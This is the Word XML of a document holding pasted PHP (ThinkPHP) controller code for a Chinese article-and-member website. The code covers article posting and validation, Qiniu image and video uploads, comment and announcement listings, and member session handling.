    </w:p>
    <w:p w14:paraId="7756F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Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4839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his-&gt;redirect("user/login");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CEC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7EADD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_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4D1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this-&gt;member);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9E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04F2C3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041B3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num = Db::name('article')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380C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_num',$article_num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFEB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 = Db::name('article_ping')-&gt;where(['aid_uid'=&gt;$this-&gt;member['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3413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_ping',$article_ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE40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zan = Db::name('article_zan')-&gt;where(['aid_uid'=&gt;$this-&gt;member['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615A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_zan',$article_zan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9B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2E2F4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CD8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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321032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input('mychannel/d') ? input('mychannel/d') : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F38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ychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F5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A9A1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536FE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0748E5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'    =&gt;      'require|length:5,100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12969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内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'  =&gt;      'length:100,9999',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BC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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'=&gt;      'require|number|in:1,2,3,4,5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681ED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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'   =&gt;      'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02999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73D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF5C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post['title'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E31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post['content'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0552A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post['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67A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gt;      $post['typeid']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFD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065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823E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validate-&gt;getError()]);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457EF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F4C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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5E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content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A6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内容不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB2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AD5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mychannel == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA4C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images']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E398B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图片不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B9E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2C54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mychannel == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B67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video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06C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视频不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254E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4BE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DC4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_db = Db::name('mychannel')-&gt;cache(true)-&gt;find($mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DCF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_db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4D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2A60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47D7A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_where['title'] = $post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCEC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46ED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_where['id'] = ['&lt;&gt;',$id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96F5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487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Db::name('article')-&gt;where($title_where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FF2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1C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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D7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2390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2F7E1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         =   $post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E8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372F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   =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C029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0C4C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update_time']   =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8B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es']           =   50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DCE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2B60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3CA06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1559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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24A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post['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744B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136BE5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ource']        =   $this-&gt;member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FD5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post['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090D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        =   $post['typeid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0A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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C70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post['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A3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mychannel == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395F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s']        =   json_encode($post['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8AFF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mychannel == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AD3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video']         =   $post['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A6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4C8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9319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Db::name('article')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDF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AD7D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id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B2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4F5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添加失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17E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FBE8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51382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Db::name('article')-&gt;where(['id'=&gt;$id,'uid'=&gt;$this-&gt;member['id']])-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C7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F543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id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA59D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5A21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修改失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637F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032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5286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11A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 == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21780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Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0,'tid'=&gt;132])-&gt;order('des desc')-&gt;cache(true)-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148B90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93F2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Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0,'id'=&gt;['&lt;&gt;','132']])-&gt;order('des desc')-&gt;cache(true)-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC8F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260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38DF1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12BD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b::name('article')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA77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35785C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文章不存在或已删除！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C51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46B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4DD06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5EE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id',$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062BA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typeid',$typeid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E5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C27D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86E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load(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BB3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file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776B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319ECE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Path){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467B5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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D1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1A9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771D7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jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E34B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ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6D0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33CA28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8DD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substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759840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6CDCE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725434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236447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590677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68177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67842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549F5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00458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07131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036892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ode'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC4B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sg']   =   $err;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018558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3A166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ode'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1E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sg']   =   '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23067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src']   =   _imgUrl().$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A089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src_s']   =  $ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E1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title'] =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C35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2DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA4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8E93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load_video(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC00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38B8C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gt;'sdkQiniu'])-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24470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5414A4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36E517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0DCB1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43B3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peline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F729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db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6A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50340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key = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D51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fops.'|saveas/'.$savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2D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nurl=config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C73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licy = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB3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Ops' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B0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ersistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A86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NotifyUrl' =&gt; $wenurl.'/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E60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79D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token = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69848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file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75C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4B9E6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17B74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uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBF3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7F67F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ode'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320A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sg']   =   $err;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2602E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9344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ode'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A2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sg']   =   '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F92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src']   =   _imgUrl().$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BD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src_s']   =  $ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CC1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title'] =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBA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ata']['persistentId'] = $ret['persistentId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240F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148C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F0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C1F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5123A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input('mychannel/d') ? input('mychannel/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA218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ychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68814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 = input('hide/d') ? input('hide/d') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210E9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hide',$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE82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6E1A5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lt;&gt;',4];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFC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qiniu_video_type'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F55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0,1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E67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ide){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E1D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hide;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F4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4653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article')-&gt;where($where)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB2F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unt',$count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AD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list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC162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E539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mment(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB3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_uid']   =   $this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA21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article_ping')-&gt;where($where)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F73F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unt',$count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48EB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E7D4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7DAD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7B6E5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2DA1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93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g(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544A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ize = input('size') ? input('size') : '300';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFC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http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA6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getimagesize($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3AD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Ext = image_type_to_extension($info[2], false);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE02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un = "imagecreatefrom{$imgExt}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A208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Info = $fun($img);                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A0D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ime = $info['mime'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364E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ime = image_type_to_mime_type(exif_imagetype($img)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D01B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Content-Type:'.$mime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC367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ality = 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A69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Ext == 'png') $quality = 9;        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B9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ImgInfo = "image{$imgExt}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F6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ImgInfo($imgInfo, null, $quality);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FD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destroy($imgInfo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C7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3A60D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6A6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onggao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC1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ges') ? input('pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D8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gonggao')-&gt;order('id desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E3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C07DD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Y-m-d H:i',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD79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B6FB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BE3AE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A9D9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714C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44FA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3DDCFB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index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D33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6CED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Index extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27857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777A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53F7B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620587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1EDB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FCF1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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461E89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123");exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C850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78F2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A26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url(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137AA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等待配置下载地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64270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88C3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config()['config']['appurl'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E33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 ".$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EFDA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8D64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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59BB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6881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816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ianqi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5598C6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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610BC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html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF8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165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E3538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AC6C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index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF5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use app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B02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542C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2F133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104BD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mber extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A4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063B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__construct(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68198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arent::__construct();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37910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Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51458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his-&gt;redirect("user/login");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BD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1DBCB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_member());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6B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member_category')-&gt;where(['tid'=&gt;0,'hide'=&gt;1])-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52009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category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B393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5D75F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roller=strtolower($request-&gt;controller());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D744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tion=strtolower($request-&gt;action());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D8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tid=Db::name('member_category')-&gt;where(['controller'=&gt;$controller,'function'=&gt;$action])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C831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ategorytid['tid'] != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3B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tid=Db::name('member_category')-&gt;where('id',$categorytid['tid'])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3F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05C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s=Db::name('member_category')-&gt;where(['tid'=&gt;$categorytid['id'],'hide'=&gt;1])-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707E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s',$categorys);      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582C6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ctive',$controller.$action);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518F3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tid',$categorytid);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593833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5C186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2E508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member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220F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lt;',3];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561EF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roups=Db::name('member_groups')-&gt;where('jingyan','gt',$member['jingyan'])-&gt;order('id asc')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39406A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_groups',$member_groups);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77556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1751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5F3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out(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE3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_member('id'),'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A4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null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53B7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redirect('user/login');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A30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5C0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dify(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77608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DC6D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648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nickname(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FA2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3543A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1535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bile(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C93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28FFD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EA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mail(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B8C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F27F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0C47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ssword(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611572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EE8E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918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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A7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DB69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8F01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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635F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F753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BFAD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Add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7087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Code=Db::name('member_config')-&gt;where('name','articleCode')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1D78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Code',$articleCode);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD8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65CC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509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voriteList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F938D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AB554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6A87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neypay(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3E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Session::get('user','ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31654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oken',$token);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16055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5DA3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1E4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yRecord(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48781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20F7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A7B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toutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C4E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ser/index",['id'=&gt;_member('id'),'weitoutiao'=&gt;'1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2594A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E03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23DC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853F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09471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07928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webfig($name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF39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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60E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config()['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A2B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ogo']   = _imgurl().$data['logo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DE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data[$name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257B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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75489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7D764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return $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7D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3126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ad($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DABD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data=Db::name('ad')-&gt;where(['id'=&gt;$id])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1FF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img'] = _imgurl().$data['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CFCF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D4943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EC0D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ember($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68436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ession::get('user','ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41E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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641ECB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ession(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C799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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F812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09906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04EC7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_decrypt($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF62D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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B4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ession(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27604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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE40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24D00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5B54EC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40609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null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697B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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147565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6C816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11E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gt;where(['id'=&gt;$id,'hide'=&gt;1])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B043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7ADE91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null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778A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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5A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B277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2DE7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uanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$data['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F2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ensi']=Db::name('member_guanzhu')-&gt;where(['gz_uid'=&gt;$data['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
